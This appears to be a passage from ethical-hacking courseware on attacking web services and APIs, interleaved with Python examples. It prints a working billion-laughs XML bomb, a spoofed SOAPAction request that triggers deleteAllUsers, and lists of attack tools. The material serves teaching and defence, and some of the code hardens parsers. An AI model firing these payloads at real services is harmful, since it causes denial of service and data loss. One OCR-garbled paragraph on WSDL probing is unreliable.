Redirection Attacks: Attackers develop code and links that resemble a legitimate site that a user wants to visit; however, the URL redirects the user to a malicious website on which attackers could potentially obtain the user's credentials and other sensitive information.
Frame Injection: When scripts do not validate their input, attackers inject code through frames. This affects all the browsers and scripts that do not validate untrusted input. These vulnerabilities occur in HTML pages with frames. Another reason for this vulnerability is that web browsers support frame editing.
Session Fixation: Session fixation helps attackers hijack valid user sessions. They authenticate themselves using a known session ID and then use the known session ID to hijack a user-validated session. Thus, attackers trick users and access a genuine web server using an existing session ID value.
ActiveX Attacks: Attackers lure victims via email or via a link that is constructed such that the loopholes of remote code execution become accessible, allowing the attackers to obtain access privileges equal to those of authorized users.
Attack Web Services
Web services work atop legacy web applications, and any attack on a web service immediately exposes an underlying application's business logic vulnerabilities to various attacks.
Web Services Probing Attacks: trap the WSDL document and identify the application's entry points, functions, and message types; create a set of valid requests by selecting operations and formulating the XML request messages that are submitted to the service; include malicious content in SOAP requests and analyze the errors to gain a deeper understanding of potential weaknesses.
Web Service Attacks: SOAP Injection: inject malicious query strings in the user input field to bypass web services authentication mechanisms and access backend databases; this attack works similarly to SQL injection attacks.
Web Service Attacks: SOAPAction Spoofing: attackers use tools such as WS-Attacker to manipulate the operation included in the SOAPAction header instead of the first child element of the SOAP body.
Web Service Attacks: WS-Address Spoofing
Web Service Attacks: XML Injection: generate logical errors or a denial of service by abusing weaknesses in the parser and in the processing of the XML request (recursive payloads, oversize payloads).
Web Service Attack Tools
Attack Web Services
Web applications often use web services to implement particular functionality. If web services integrated within the web applications are vulnerable, the applications themselves become vulnerable, allowing attackers to exploit such applications through the integrated vulnerable web services. Web services work atop the legacy web applications, and any attack on a web service will immediately expose an underlying application's business and logic vulnerabilities for various attacks. Attackers can target web services using various techniques, as web applications make these services available to users through different mechanisms. Hence, the possibility of vulnerabilities increases. Attackers exploit these vulnerabilities to compromise web services.
There are many reasons why attackers target web services. Attackers choose an appropriate attack depending on the purpose of the attack. If attackers merely want to stop a web service from serving intended users, then they can launch a DoS attack by sending numerous requests.
Web Services Probing Attacks
WSDLfilesare automateddocumentsconsisting of sensitive informationabout service ports,
connections formedbetweentwo electronicmachines, and so on. Attackerscan use WSDL
probing attacksto obtain informationabout the vulnerabilitiesin publicand privateweb
services,as well as to perform
an SQLattack
Awebservice probing attackinvolvesthe following
steps:
=
In the firststep,trapthe WSDLdocumentfromweb service trafficand analyze it to
determinethe purposeof the application, functionalbreakdown, entrypoints,and
message types
Createa set of valid requests byselecting a set of operationsand formulating the
requestmessages accordingto the rulesof the XML schema that can be submittedto
the webservice
Usetheserequests
to includemalicious
contents i n SOAP andanalyze
requests errors to
gaina deeper
understanding
of potential
securityweaknesses
ical andCountermensores
Mackin ©by E-Comel
Copyright
&
Figure Probing
14,78;Web Services atack
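The first two probing steps above, as an added example (this is not code from the CEH courseware): parse a WSDL 1.1 document to enumerate its endpoint and operations, then build a schema-shaped SOAP request for each operation. The WSDL below is constructed for this example; its service name, namespace, endpoint URL and the createUser/deleteAllUsers operations (chosen to match the SOAPAction example later in this section) are assumptions, not a real service.

```python
"""Added example (not from the CEH courseware): enumerate the operations and
endpoint of a WSDL 1.1 document and build a SOAP request for each operation.
The WSDL, namespace, endpoint and operation names are constructed assumptions."""
import xml.etree.ElementTree as ET

NS = {
    "wsdl": "http://schemas.xmlsoap.org/wsdl/",
    "soap": "http://schemas.xmlsoap.org/wsdl/soap/",
}
SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"

# Constructed sample WSDL: two operations, one of them clearly dangerous.
SAMPLE_WSDL = """<?xml version="1.0"?>
<definitions name="UserService" targetNamespace="http://example.test/users"
    xmlns="http://schemas.xmlsoap.org/wsdl/"
    xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema"
    xmlns:tns="http://example.test/users">
  <message name="createUserRequest">
    <part name="login" type="xsd:string"/>
    <part name="pwd" type="xsd:string"/>
  </message>
  <message name="deleteAllUsersRequest"/>
  <portType name="UserPortType">
    <operation name="createUser"><input message="tns:createUserRequest"/></operation>
    <operation name="deleteAllUsers"><input message="tns:deleteAllUsersRequest"/></operation>
  </portType>
  <service name="UserService">
    <port name="UserPort" binding="tns:UserBinding">
      <soap:address location="http://example.test/service"/>
    </port>
  </service>
</definitions>"""


def parse_wsdl(wsdl_text):
    """Return (endpoint, {operation: [input part names]}) for a WSDL 1.1 document."""
    root = ET.fromstring(wsdl_text)
    # Message name -> list of part names (the parameters the operation expects).
    messages = {}
    for msg in root.findall("wsdl:message", NS):
        messages[msg.get("name")] = [p.get("name") for p in msg.findall("wsdl:part", NS)]
    operations = {}
    for op in root.findall("wsdl:portType/wsdl:operation", NS):
        inp = op.find("wsdl:input", NS)
        # "tns:createUserRequest" -> "createUserRequest": drop the prefix.
        msg_name = inp.get("message").split(":")[-1] if inp is not None else None
        operations[op.get("name")] = messages.get(msg_name, [])
    addr = root.find("wsdl:service/wsdl:port/soap:address", NS)
    endpoint = addr.get("location") if addr is not None else None
    return endpoint, operations


def build_soap_request(target_ns, operation, values):
    """Build a SOAP 1.1 envelope whose Body carries <operation> with one child per part."""
    env = ET.Element("{%s}Envelope" % SOAP_ENV)
    body = ET.SubElement(env, "{%s}Body" % SOAP_ENV)
    op = ET.SubElement(body, "{%s}%s" % (target_ns, operation))
    for name, value in values.items():
        ET.SubElement(op, name).text = value
    return ET.tostring(env, encoding="unicode")


def probe_targets(wsdl_text):
    """Steps 1 and 2 of the probing procedure: every operation with a ready-to-send
    request whose parameters hold a marker the tester later swaps for malicious content."""
    root = ET.fromstring(wsdl_text)
    target_ns = root.get("targetNamespace")
    endpoint, operations = parse_wsdl(wsdl_text)
    requests = {
        op: build_soap_request(target_ns, op, {p: "PROBE" for p in parts})
        for op, parts in operations.items()
    }
    return endpoint, requests


if __name__ == "__main__":
    endpoint, reqs = probe_targets(SAMPLE_WSDL)
    print("endpoint:", endpoint)
    for op, req in reqs.items():
        print(op, "->", req)
```

The operation list is the tester's entry-point inventory; a deleteAllUsers operation advertised in a public WSDL is itself a finding before any request is sent.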
Web Service Attacks: SOAP Injection

SOAP is a lightweight and simple XML-based protocol designed to exchange structured and typed information on the web. The Envelope element is always the root element of a SOAP message in the XML schema.

SOAP injection uses special characters such as single quotes, double quotes, semicolons, and so on. The attacker injects malicious query strings into the user input field to bypass web service authentication mechanisms and access backend databases. This attack works similarly to SQL injection attacks.

Figure 14.79: Web Services SOAP Injection attack
Web Service Attacks: SOAPAction Spoofing

Every SOAP request message contains an operation that is executed by the application, included as the first child element in the SOAP Body. When SOAP messages are transmitted using HTTP, an additional HTTP header known as SOAPAction is used. The operation to be executed is included in the SOAPAction header. The header informs the receiving web service about the operation present in the SOAP Body without the need to perform XML parsing. Attackers can exploit this optimization by manipulating the operations included in the SOAPAction header.

For example, consider a web service that includes two operations, createUser and deleteAllUsers, and is vulnerable to such an attack. Assume that this web service is protected by a gateway and that only authorized users who have direct communication with the web service can perform the deleteAllUsers operation. An attacker in front of the gateway can perform a SOAPAction spoofing attack by manipulating the SOAPAction header as follows.

An HTTP request message creating a user:

POST /service HTTP/1.1
Host: certifiedHacker
SOAPAction: "createUser"

<Envelope>
  <Header />
  <Body>
    <createUser>
      <login>rinnimathews</login>
      <pwd>password</pwd>
    </createUser>
  </Body>
</Envelope>

The attacker can modify the SOAPAction header to "deleteAllUsers". The gateway passes this message because the SOAP Body still consists of the createUser operation, while the web service, which dispatches on the header, executes deleteAllUsers:

POST /service HTTP/1.1
Host: certifiedHacker
SOAPAction: "deleteAllUsers"

<Envelope>
  <Header />
  <Body>
    <createUser>
      <login>rinnimathews</login>
      <pwd>password</pwd>
    </createUser>
  </Body>
</Envelope>
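The mismatch the two requests above exploit, as an added example (not code from the CEH courseware): a gateway that filters on the SOAP Body, a backend that dispatches on the SOAPAction header, and the check that closes the gap. The requests are the ones from the text; the function names and the policy that external clients may only call createUser are assumptions for this example.

```python
"""Added example (not from the CEH courseware): SOAPAction spoofing between a
Body-filtering gateway and a header-dispatching backend, plus the hardened
dispatcher. The allowed-operation policy and function names are assumptions."""
import xml.etree.ElementTree as ET

EXTERNALLY_ALLOWED = {"createUser"}   # what the gateway lets outside clients call


def http_request(action, body):
    """Assemble a minimal SOAP-over-HTTP request: headers, blank line, body."""
    return "\r\n".join([
        "POST /service HTTP/1.1",
        "Host: certifiedHacker",
        'SOAPAction: "%s"' % action,
        "",
        body,
    ])


CREATE_USER_BODY = ("<Envelope><Header/><Body><createUser>"
                    "<login>rinnimathews</login><pwd>password</pwd>"
                    "</createUser></Body></Envelope>")
LEGIT = http_request("createUser", CREATE_USER_BODY)
SPOOFED = http_request("deleteAllUsers", CREATE_USER_BODY)   # header changed, Body not


def split_request(raw):
    """Return (soapaction, body_operation) from a raw request string."""
    head, _, body = raw.partition("\r\n\r\n")
    action = None
    for line in head.split("\r\n")[1:]:          # skip the request line
        name, _, value = line.partition(":")
        if name.strip().lower() == "soapaction":
            action = value.strip().strip('"')
    root = ET.fromstring(body)
    # First child of Body, namespace prefix stripped (real envelopes use soapenv:).
    soap_body = next(el for el in root if el.tag.split("}")[-1] == "Body")
    operation = soap_body[0].tag.split("}")[-1]
    return action, operation


def gateway_allows(raw):
    """The gateway parses the XML and filters on the Body operation only."""
    _, operation = split_request(raw)
    return operation in EXTERNALLY_ALLOWED


def backend_vulnerable(raw):
    """Backend that trusts the header to skip XML parsing: executes SOAPAction."""
    action, _ = split_request(raw)
    return action


def backend_hardened(raw):
    """Backend that refuses any request whose header and Body disagree and
    dispatches on the Body, so the header can no longer select the operation."""
    action, operation = split_request(raw)
    if action is not None and action != operation:
        raise PermissionError("SOAPAction %r does not match Body operation %r"
                              % (action, operation))
    return operation


if __name__ == "__main__":
    for label, req in (("legit", LEGIT), ("spoofed", SPOOFED)):
        print(label, "gateway:", gateway_allows(req), "backend runs:", backend_vulnerable(req))
```

The same check belongs in the gateway as well: a gateway that compares the header to the Body's first child rejects the spoofed request before it reaches the service.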
Attackers use tools such as WS-Attacker to perform SOAPAction spoofing:

▪ WS-Attacker
Source: https://github.com
WS-Attacker is a tool for performing automatic penetration tests of web services. It is an open-source and easy-to-use software solution with multiple plugins for different attack types, and it provides a security-checking interface. WS-Attacker provides functionality to load WSDL files and send SOAP messages to web service endpoints, and it can test whether a web service is vulnerable to attacks such as XML Signature Wrapping, SOAPAction spoofing, and DoS.

Figure 14.80: Screenshot of WS-Attacker
Web Service Attacks: WS-Address Spoofing

WS-Addressing provides additional routing information in the SOAP header to support asynchronous communication. This technique allows the transmission of web service request and response messages using different TCP connections. It is essential for long-running service requests where the calculation time of the server-side application exceeds the lifetime of a single TCP connection.

WS-Addressing includes an optional FaultTo address element for stating an alternative endpoint that is to be used in case of any complications. As the requester selects the endpoint address used in the ReplyTo and FaultTo headers, it is not secured properly against tampering by intermediaries. Although the specification asks for digital signatures on these header fields, the values mostly depend on the default setting without any proper security.

This causes a vulnerability that can be exploited by the attacker to perform the WS-Address spoofing attack. In the WS-Address spoofing attack, an attacker sends a SOAP message containing fake WS-Addressing information to the server. The <ReplyTo> header contains the address of an endpoint selected by the attacker instead of the web service client. The endpoint selected by the attacker receives unrequested traffic via SOAP messages. Furthermore, the attacker may generate a massive amount of traffic, thus resulting in a DoS attack. Attackers use tools such as WS-Attacker to identify and exploit WS-Addressing spoofing vulnerabilities.

Figure 14.81: Illustration of WS-Address spoofing attack (regular SOAP traffic between client and server; unrequested SOAP traffic received by the endpoint named in the spoofed ReplyTo header)

Web Service Attacks: XML Injection

Web applications sometimes use XML to store data such as user credentials in XML documents; attackers can parse and view such data using XPath. XPath defines the flow of the document and verifies user credentials, such as the username and password, to redirect users to a specific user account. Attackers identify the XPath and insert an XML injection or XML schema to bypass the authentication process and gain unrestricted access to the data stored in XML. The process by which attackers enter values that take advantage of the query to the XML is an XML injection attack.

Figure 14.82: Web Services XML Injection attack
Web Service Attacks: Parsing Attacks

Parsing attacks exploit vulnerabilities and weaknesses in the processing capabilities of the XML parser to create a DoS attack or generate logical errors in web service request processing. A parsing attack is performed when an attacker succeeds in modifying a file request or string. The attacker changes the values by superimposing one or more operating system commands via the request. Parsing is possible when the attacker executes .bat (batch) or .cmd (command) files.

▪ Recursive Payloads: Attackers send XML documents with excessively deep element nesting or chains of entity references that the parser must expand in full, exhausting its memory and CPU.
▪ Oversize Payloads: Attackers send a payload that is excessively large to consume all the system resources, rendering web services inaccessible to other legitimate users.
Web Service Attack Tools

▪ SoapUI Pro
Source: https://www.soapui.org
SoapUI Pro is a web service testing tool that supports multiple protocols such as SOAP, REST, HTTP, JMS, AMF, and JDBC. An attacker can use this tool to carry out web service probing, SOAP injection, XML injection, and web service parsing attacks.

Figure 14.83: Screenshot of SoapUI Pro

▪ XMLSpy
Source: https://www.altova.com
Altova XMLSpy is an XML editor and development environment for modeling, editing, transforming, and debugging XML-related technologies.

Figure 14.84: Screenshot of XMLSpy
Additional Web Application Hacking Tools

▪ Sn1per (https://github.com)
▪ WSSiP (https://github.com)
▪ X Attacker (https://github.com)
▪ timing_attack (https://github.com)
▪ HTTrack (http://www.httrack.com)
▪ SQL Injection Scanner (https://pentest-tools.com)
▪ XSS Scanner (https://pentest-tools.com)
▪ SQL Exploiter (https://pentest-tools.com)
▪ HTTP Request Logger (https://pentest-tools.com)
▪ WebCopier (http://www.maximumsoft.com)
▪ WPScan (https://wpscan.org)
▪ Instant Source (https://www.blazingtools.com)
Module Flow

Web API, Webhooks, and Web Shell

Recent years have witnessed an exponential increase in the usage of web APIs in application development. Web APIs help developers in building web applications that retrieve data from multiple online sources. As web APIs are incorporated in many popular applications such as social networking, shopping, and search engines, the importance of securing APIs and their integrity has increased. Any security breach in an API can expose personal or business-critical data to attackers. This section discusses the basic concepts of web APIs, webhooks, and web shells; API vulnerabilities and hacking techniques; and the best practices for API security.
What is Web API?

A web API is an application programming interface that provides online web services to client-side applications for retrieving and updating data from multiple online sources. It is a special type of interface where interactions between applications can be allowed through the Internet and some web-based protocols. Web APIs make resources accessible on the Internet, and they are generally accessed via the HTTP protocol. They also consist of different types of tools, functions, and protocols that can be used to develop software or applications without any complexity.

For example, consider a traditional web application that is supported by multiple mobile platforms with no centralized API. This results in the complexity of updating business logic for each individual implementation whenever there is an update in the client applications. Using a centralized web API reduces this complexity and increases the integrity of updating and changing the data or business logic at one central location.

Figure 14.85: Illustration of Web API
Web Services APIs

▪ RESTful API: REST (Representational State Transfer) APIs, also known as RESTful APIs, are designed around HTTP. APIs with the following features can be referred to as RESTful APIs:
o Stateless: The client end stores the state of the session; the server is restricted from saving data during the request processing.
o Cacheable: The client should save responses (representations) in the cache. This feature can enhance API performance.
o Client-server Environment: Both the client and the server should be independent of each other because the server handles backend operations and the client is the front end from where requests are made.
o Uniform Interface: Resources must be specifically and independently recognized via a single URL, and it should be possible to modify a resource by employing basic protocol methods such as PUT, POST, GET, and DELETE.
o Layered System: A multiple-layer architecture allows intermediary servers to supply shared memory (cache) to achieve scalability, because the client system never directly notifies the main server of its connectivity.
o Code on Demand: An optional feature where the server can also provide executable code to the client, through which the client's functionality can be temporarily customized.
▪ XML-RPC: Extensible Markup Language Remote Procedure Call (XML-RPC) is a communication protocol that uses a specific XML format to transfer data, whereas SOAP uses a proprietary XML format to transfer data. It is simpler than SOAP and uses less bandwidth to transfer data.
▪ JSON-RPC: JavaScript Object Notation Remote Procedure Call (JSON-RPC) is a communication protocol that serves in the same way as XML-RPC but uses the JSON format instead of XML to transfer data.
What are Webhooks?

Webhooks are triggered or pushed based on events and allow applications to update other applications with the latest information. For example, when you click the "Notify me" button for a product, you get an alert from the application when that item is available for purchase. These notifications from the applications are usually sent through webhooks.

Operation of Webhooks

Webhooks are enrolled along with the domain registration via the user interface or API to inform the clients about a new event occurrence. The generated path contains the required code that automatically executes on the new event occurrence. Here, systems need not know what should be run; they just need to trace the path to generate notifications.

A webhook is a powerful tool because everything remains isolated on the web. As shown in the figure below, when system-2 gets a notification message from the selected path of the domain, it not only becomes aware of new event occurrences on other machines but also responds to them. The path contains the code that can be accessed via an HTTP POST request. It also informs the user about where the message has been triggered from, including its date and time and other details related to the event. Webhooks can be private or public.

Figure 14.86: Operation of webhooks (System-1 sends an HTTP POST to the webhook path of System-2)

Webhooks vs. APIs

▪ Webhooks are automated messages from websites to the server. APIs are used for server-to-website communication.
▪ Webhooks only get reports or notifications via HTTP POST when a new update is made. APIs make calls irrespective of the data updates.
▪ Webhooks update applications or services with real-time information. API implementations need to perform additional activity to do this.
▪ Webhooks have less control over data flow. APIs have easy control over data flow.
OWASP Top 10 API Security Risks

Source: https://www.owasp.org

According to OWASP, the following are the top 10 API security risks:

▪ Broken Object Level Authorization: APIs expose endpoints handling object identifiers, and the server component does not track the client's state properly, resulting in a massive attack surface. This object-level access control flaw allows the attacker to modify the object's ID value and obtain unauthorized access to the data source.
▪ Broken User Authentication: Vulnerabilities in authentication mechanisms allow attackers to compromise API security by using authentication tokens and exploiting implementation flaws. Attackers can easily capture authentication tokens and steal user identities. APIs are vulnerable to authentication attacks such as credential stuffing and brute-forcing.
▪ Excessive Data Exposure: While designing an API, the developers may expose all the object properties to the clients without considering their individual sensitivity and depend on the clients for filtering data. This allows attackers to retrieve more information than requested.
▪ Lack of Resources and Rate Limiting: APIs avoid enforcing restrictions on the number of resources requested by the client. This allows attackers to consume all the available resources, resulting in service unavailability to legitimate users, causing DoS. It may also include authentication flaws that can be exploited to perform brute-force attacks.
▪ Broken Function Level Authorization: Complexity in access control policies through different hierarchies, groups, and roles between administrative and regular functions can cause authorization errors. This allows attackers to gain unauthorized access to administrative functions or users' resources.
▪ Mass Assignment: APIs accidentally expose internal variables or objects due to improper binding and filtering based on a whitelist. This allows attackers to modify properties with unauthorized access to the object.
▪ Security Misconfiguration: Security misconfigurations include vulnerabilities such as insecure default configurations, ad-hoc configurations, open cloud storage, misconfigured HTTP headers, permissive cross-origin resource sharing (CORS), and missing TLS/SSL. This allows attackers to perform various attacks and compromise the system security.
▪ Injection: Sending untrusted data as queries to the interpreter may result in injection flaws such as SQL, LDAP, XML, and command injection. This allows attackers to trick the interpreter into executing malicious commands by sending crafted data and gain unauthorized access.
▪ Improper Assets Management: Improper asset management occurs due to a lack of version control for older versions of API hierarchies, and consists of vulnerabilities that can be exploited by the attacker.
▪ Insufficient Logging and Monitoring: Lack of proper logging and monitoring, along with missing or ineffective integration with incident response, can make the system vulnerable. This allows attackers to compromise the system, maintain persistence, and pivot to other systems and networks to extract, tamper with, or destroy data.

Table 14.3: OWASP Top 10 API Security Risks
API Vulnerabilities

Design flaws can cause serious vulnerabilities:

▪ Enumerated Resources: Disclosing information through the public unauthenticated API. This allows attackers to guess user IDs easily, compromising the security of the user data.
▪ Sharing Resources via Unsigned URLs: Video files that are vulnerable to hotlinking. This can cause several problems such as poor analytics and strains on resources, and it can be used by attackers for exploitation.
▪ Vulnerabilities in Third-Party Libraries: Developers use third-party open-source software libraries having many security flaws. Avoiding regular updates and relegating security fixes can result in security flaws.
▪ Improper Use of CORS: Cross-origin resource sharing (CORS) is a mechanism that enables the web browser to perform cross-domain requests; improper implementations of CORS can cause unintentional flaws. Using the "Access-Control-Allow-Origin" header to allow all origins on private APIs can lead to hotlinking.
▪ Code Injections: If the input is not sanitized, attackers may use code injection techniques such as SQLi and XSS to add malicious SQL statements or code to the input fields of the API. This allows attackers to steal critical information such as session cookies and user credentials.
▪ RBAC Privilege Escalation: Privilege escalation is a common vulnerability present in APIs having role-based access control (RBAC) where changes to endpoints are made without proper attention. This allows attackers to gain access to users' sensitive information.
▪ No ABAC Validation: No proper attribute-based access control (ABAC) validation allows attackers to gain unauthorized access to API objects or perform actions such as viewing, updating, or deleting.
▪ Business Logic Flaws: Many APIs come with vulnerabilities in business logic. This allows attackers to exploit legitimate workflows for malicious purposes.

Table 14.4: API vulnerabilities
Web API Hacking Methodology

Web-based APIs are increasingly used to support heterogeneous devices such as mobile and IoT devices. To make these web-based APIs more user friendly, developers compromise on the aspect of security, thereby making web-based services vulnerable to various attacks.

Hacking a web API involves the following phases:

▪ Identify the target
▪ Detect security standards
▪ Identify the attack surface
▪ Launch attacks
Identify the Target

Before hacking an API, an attacker first needs to identify the target and its perimeter:

▪ HTTP: APIs such as SOAP and REST mostly use the HTTP protocol for communicating API-based messages. The HTTP protocol is a text-based protocol where the header information is transmitted in a readable format. For example, consider the following HTTP Request and Response headers:

Figure 14.87: Example of HTTP Request header (request line, headers such as Accept-Encoding: gzip, deflate, a blank line separating header and body, and the request body)

Figure 14.88: Example of HTTP Response header (status line, response headers, and the response body)

As shown in the figures, both HTTP Request and Response headers are transmitted in plaintext; an attacker can easily manipulate these headers to identify the target.

▪ Message Formats: The API messages transmitted over the web take some format, such as JSON for REST APIs and XML for SOAP APIs. If these formats are used incorrectly, they can pave the way for vulnerabilities. As these formats are easy to understand, an attacker can easily manipulate messages encoded in these formats to identify the target and its perimeter.
Detect Security Standards

Although APIs claim to be secure as they incorporate security standards such as OAuth and SSL, they still include many vulnerabilities that can be exploited by attackers.

▪ APIs such as SOAP and REST implement different authentication/authorization standards such as OpenID Connect, SAML, OAuth 1.x and 2.x, and WS-Security.
▪ SSL provides transport-level security for API messages to ensure confidentiality through encryption and integrity through signatures. Although SSL is used for security, in most API messages only sensitive user data such as credit card details are encrypted, leaving other information in plaintext.

If these security standards are configured improperly, an attacker can identify vulnerabilities in these standards for further exploitation. For example, an attacker can capture and reuse a session token to retrieve a legitimate user's account information that is not encrypted.
Identify the Attack Surface

▪ API Metadata: API metadata such as a Swagger definition describes the operations an API exposes and the parameters each accepts. Attackers can exploit vulnerabilities in these definitions to perform various attacks on APIs.

Figure 14.89: Example of Swagger definition (an operation whose summary begins "Delete", returning type "void", with one required parameter of type "string", paramType "path", and allowMultiple: false)

▪ API Discovery: If an API does not have metadata, attackers monitor and record the communication between the API and an existing client to identify the initial attack surface. For example, an attacker may use a mobile app that uses the target API, configure a local proxy for recording traffic, and finally configure the mobile device to use this proxy to access the API. Then, the attacker uses automated tools to generate metadata from the recorded traffic.
▪ Brute Force: If none of the abovementioned techniques works, the attackers try to identify the API paths, arguments, etc., through brute-forcing. Common API paths used by developers include /api, /api/v2, /apis.json, etc. Furthermore, some APIs such as hypermedia APIs allow retrieving links and parameters related to an API response. This information helps attackers to identify the attack surface.
Launch Attacks

After identifying the target API, analyzing the message formats and security standards, and identifying the attack surface, attackers perform various attacks on the target API to steal sensitive information such as credit card details and credentials. These include fuzzing, invalid input attacks, malicious input attacks, injection attacks, exploiting insecure configurations, login/credential stuffing attacks, API DDoS attacks, authorization attacks on the API (OAuth attacks), insecure SSL configuration, user spoofing, insecure direct object references (IDOR), man-in-the-middle attacks, insecure session/authentication handling, session replay attacks, and social engineering.

Various attacks performed on APIs are discussed below:
▪ Fuzzing: Attackers use the fuzzing technique to repeatedly send random input to the target API to generate error messages that reveal critical information. To perform fuzzing, attackers use automated scripts that send numerous requests with varying combinations of input parameters. Attackers use tools such as Fuzzapi to perform fuzzing on the target API.
▪ Invalid Input Attacks: In some scenarios, fuzzing is difficult to perform due to the structure of the API. In such cases, attackers give invalid inputs to the API, such as sending text in place of numbers, sending numbers in place of text, sending a greater number of characters than expected, and sending null characters, to extract sensitive information from unexpected system behavior and error messages. At the same time, attackers also manipulate the HTTP headers and values, targeting both the API logic and the HTTP protocol.
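The fuzzing and invalid-input procedure above as an added example (not code from the CEH courseware): a small harness that derives the four mutation classes named in the text (text for numbers, numbers for text, over-long values, embedded null characters), runs each against a handler, and buckets the outcomes so that the tester can see which inputs leak error detail. The API handler is a constructed stand-in; no real service is contacted, and its field rules, file path, and the "leaky" behavior are assumptions for this example.

```python
"""Added example (not from the CEH courseware): an invalid-input harness that
mutates each parameter of a request and classifies the handler's reaction.
The handler is a constructed stand-in for an unhardened API endpoint."""
import json


def mutate(value):
    """Invalid-input variants for one parameter value, keyed by mutation name."""
    if isinstance(value, int):
        base = [("text_for_number", "abc"), ("oversize", "9" * 4096)]
    else:
        base = [("number_for_text", 1234567890), ("oversize", "A" * 4096)]
    base.append(("null_byte", str(value) + "\x00"))
    return base


def fuzz(handler, params):
    """Send every single-field mutation; return {(field, mutation): outcome}.
    The distinct outcomes are what the tester reads: a clean 400 and a leaked
    exception text come from different code paths."""
    results = {}
    for field, value in params.items():
        for name, bad in mutate(value):
            req = dict(params, **{field: bad})
            try:
                results[(field, name)] = "ok:" + json.dumps(handler(req))
            except Exception as exc:   # the harness must survive every crash
                results[(field, name)] = "%s: %s" % (type(exc).__name__, str(exc)[:60])
    return results


def leaky_handler(req):
    """Constructed stand-in for an unhardened API endpoint (assumed rules)."""
    cust_id = int(req["id"])                    # text -> ValueError echoing the raw input
    if "\x00" in req["name"]:                   # an int here -> TypeError from the runtime
        raise RuntimeError("sqlite3 bind failed at /srv/api/db.py:42")   # internal path leak
    if len(req["name"]) > 64:
        return {"status": 400, "error": "name too long"}                 # handled properly
    return {"status": 200, "id": cust_id, "name": req["name"]}


def leaked_outcomes(results):
    """Flag outcomes that expose implementation detail (exception names, file paths)."""
    return sorted(k for k, v in results.items() if "Error" in v or "/srv/" in v)


if __name__ == "__main__":
    found = fuzz(leaky_handler, {"id": 459, "name": "rinnimathews"})
    for key, outcome in sorted(found.items()):
        print(key, "->", outcome)
    print("leaks:", leaked_outcomes(found))
```

Against a live API the handler call becomes an HTTP request and the outcome string becomes status code plus body; the bucketing logic stays the same.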
▪ Malicious Input Attacks: In the attacks discussed above, attackers try to retrieve sensitive information from unexpected system behavior or error messages. A more dangerous attack is one where the attackers inject malicious input directly to target both the API and its hosting infrastructure. To perform this attack, attackers employ malicious message payloads aimed at the XML parser. The following code snippet illustrates an XML bomb attack:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
When the abovementioned code is processed by a vulnerable or misconfigured XML parser, it will try to expand the lol9 entity (10^9 copies of the three-byte string "lol", roughly 3 GB, from a document of under 1 KB), resulting in a memory-out-of-bounds error. This either brings the target server totally down or makes it vulnerable to further attacks.

Another way in which attackers perform this attack is by uploading malicious script files, e.g., by uploading a shell script instead of a PDF document. This may result in executing the malicious script on the server or propagating the script to other parties who are trying to access the API. Using this technique, the attackers bypass the security mechanisms and try to extract information related to the underlying file system.
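Two defensive checks for the XML bomb above, and for the recursive and oversize payloads of the "Parsing Attacks" subsection earlier in this section, as an added example (not code from the CEH courseware): expansion_size() computes how large an entity would become without expanding it, and safe_parse() refuses any document that carries a DOCTYPE or entity declaration before the parser can expand anything, and any document over a size limit. Only the Python standard library is used; the 1 MB threshold is an assumption for this example, and the bomb document is generated from the text's entity pattern rather than typed in.

```python
"""Added example (not from the CEH courseware): measure an XML bomb's expansion
without expanding it, and parse only documents that carry no DTD and stay
under a size limit. The size limit is an assumption for this example."""
import re
import xml.etree.ElementTree as ET
import xml.parsers.expat

# The billion-laughs document from the text, generated rather than typed.
BILLION_LAUGHS = (
    '<?xml version="1.0" encoding="utf-8"?>\n<!DOCTYPE lolz [\n<!ENTITY lol "lol">\n'
    + "".join('<!ENTITY lol%d "%s">\n' % (i, ("&lol%s;" % (i - 1 if i > 1 else "")) * 10)
              for i in range(1, 10))
    + "]>\n<lolz>&lol9;</lolz>"
)

ENTITY_DECL = re.compile(r'<!ENTITY\s+(\w+)\s+"([^"]*)"')
ENTITY_REF = re.compile(r"&(\w+);")


def expansion_size(doc, name):
    """Bytes the entity `name` would occupy once fully expanded, computed from
    the declarations alone. Memoised, so lol9 costs ten lookups, not 10^9;
    a self-referencing chain is reported instead of followed."""
    decls = dict(ENTITY_DECL.findall(doc))
    cache = {}

    def size(n, stack):
        if n in cache:
            return cache[n]
        if n in stack:
            raise ValueError("recursive entity: " + n)
        value = decls[n]
        total, pos = 0, 0
        for m in ENTITY_REF.finditer(value):
            total += (m.start() - pos) + size(m.group(1), stack + (n,))
            pos = m.end()
        cache[n] = total + (len(value) - pos)
        return cache[n]

    return size(name, ())


def safe_parse(doc, max_bytes=1_000_000):
    """Parse `doc` only if it is small and declares no DOCTYPE or entities."""
    if len(doc.encode("utf-8")) > max_bytes:
        raise ValueError("oversize payload")          # the oversize-payload case

    def reject(*_):                                   # any DTD is refused outright
        raise ValueError("DOCTYPE or entity declaration not allowed")

    p = xml.parsers.expat.ParserCreate()
    p.StartDoctypeDeclHandler = reject
    p.EntityDeclHandler = reject
    p.Parse(doc, True)       # raises at the first declaration, before any expansion
    return ET.fromstring(doc)


if __name__ == "__main__":
    print("lol9 expands to", expansion_size(BILLION_LAUGHS, "lol9"), "bytes",
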